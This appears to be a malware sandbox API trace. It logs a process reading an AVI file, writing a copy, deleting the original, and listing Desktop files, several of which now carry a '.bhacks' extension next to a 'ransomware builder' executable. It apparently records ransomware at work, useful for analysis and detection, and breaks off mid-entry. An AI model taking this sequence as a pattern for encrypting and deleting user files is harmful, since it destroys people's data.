[0066.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0066.238] GetFileType (hFile=0x33c) returned 0x1 [0066.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0066.239] GetFileType (hFile=0x33c) returned 0x1 [0066.239] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.241] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.241] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.242] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.242] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.242] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.242] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.243] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.243] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.243] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.243] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.244] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0066.244] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.244] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0xbd2, lpOverlapped=0x0) returned 1 [0066.244] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0066.245] ReadFile (in: hFile=0x33c, lpBuffer=0x25a3eb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x25a3eb0*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0066.245] CloseHandle (hObject=0x33c) returned 1 [0066.245] WriteFile (in: hFile=0x324, lpBuffer=0x25a50c8*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x25a50c8*, lpNumberOfBytesWritten=0x6fea68*=0xbe0, lpOverlapped=0x0) returned 1 [0066.245] CloseHandle (hObject=0x324) returned 1 [0066.246] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi", lpFilePart=0x0) returned 0x27 [0066.247] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi")) returned 1 [0066.311] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0066.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0066.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x251bed1e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251bed1e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0066.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0066.312] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0066.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0066.312] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0066.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.mp4", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 0x9bede0 [0066.312] FindClose (in: hFindFile=0x9bede0 | out: hFindFile=0x9bede0) returned 1 [0066.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x251bed1e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251bed1e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed20 [0066.312] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x251bed1e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251bed1e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.313] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0066.313] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0066.313] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0066.313] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0066.313] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0066.313] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0066.314] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0066.315] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0066.315] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0066.315] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0066.315] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0066.315] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0066.315] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0066.316] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0066.317] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0066.370] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 1 [0066.370] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0066.370] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, 